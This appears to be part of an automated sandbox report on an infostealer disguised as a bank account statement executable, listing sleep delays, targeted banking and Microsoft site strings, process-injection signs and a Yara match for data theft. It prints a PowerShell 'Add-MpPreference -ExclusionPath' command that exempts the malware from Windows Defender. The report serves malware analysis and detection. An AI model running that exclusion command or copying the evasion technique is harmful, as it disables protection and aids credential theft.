                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 599639Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 599484Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 599373Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 599185Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 599077Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 598796Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 598587Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 598336Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 598230Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 598109Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597890Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597781Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597672Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597562Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597453Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597343Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597234Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597125Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597015Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596906Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596797Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596687Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596343Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596234Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595998Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595887Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595718Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595608Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595499Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595389Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594843Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594624Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594404Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594297Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594187Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594075Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 593968Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 593859Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 593750Jump to behavior
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4609654025.0000000001103000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeMemory written: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe base: 140000000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread register set: target process: 5312Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess created: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeQueries volume information: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeQueries volume information: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
